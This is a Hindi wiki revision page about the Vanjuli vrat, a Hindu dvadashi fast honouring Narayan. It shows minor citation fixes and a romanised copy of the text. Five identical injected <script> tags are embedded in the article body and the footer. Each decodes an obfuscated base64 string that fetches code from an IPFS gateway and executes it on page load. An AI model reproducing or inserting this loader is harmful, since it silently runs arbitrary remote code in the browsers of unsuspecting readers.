Difference between revisions of "वंजुली व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*वंजुली आठ महती द्वादशियों में परिगणित है।<ref>गत अध्याय 5)</ref>  
+
*वंजुली आठ महती द्वादशियों में परिगणित है।<ref>गत अध्याय 5</ref>  
*वंजुली वह [[द्वादशी]] है जो सम्पूर्ण दिन<ref>सूर्योदय से सूर्यास्त तक)</ref> रहती है और दूसरे दिन तक रहती है, जिससे द्वादशी को उपवास करना सम्भव हो सके और दूसरी तिथि पर पारण हो सके।  
+
*वंजुली वह [[द्वादशी]] है जो सम्पूर्ण दिन<ref>सूर्योदय से सूर्यास्त तक</ref> रहती है और दूसरे दिन तक रहती है, जिससे द्वादशी को उपवास करना सम्भव हो सके और दूसरी तिथि पर पारण हो सके।  
 
*द्वादशी पर ही, [[नारायण]] की स्वर्णिम प्रतिमा की पूजा करनी चाहिए।  
 
*द्वादशी पर ही, [[नारायण]] की स्वर्णिम प्रतिमा की पूजा करनी चाहिए।  
*इससे सहस्रों राजसूय यज्ञों के समान पुण्य की प्राप्ति होती है।<ref>निर्णयसिन्धु (48); स्मृतिकौस्तुभ (252-253)</ref>
+
*इससे सहस्रों राजसूय यज्ञों के समान पुण्य की प्राप्ति होती है।<ref>निर्णयसिन्धु (48); स्मृतिकौस्तुभ (252-253</ref>
 
 
 
 
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 13:00, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • vanjuli ath mahati dvadashiyoan mean pariganit hai.[1]
  • vanjuli vah dvadashi hai jo sampoorn din[2] rahati hai aur doosare din tak rahati hai, jisase dvadashi ko upavas karana sambhav ho sake aur doosari tithi par paran ho sake.
  • dvadashi par hi, narayan ki svarnim pratima ki pooja karani chahie.
  • isase sahasroan rajasooy yajnoan ke saman puny ki prapti hoti hai.[3]

  <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. gat adhyay 5
  2. sooryoday se sooryast tak
  3. nirnayasindhu (48); smritikaustubh (252-253

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>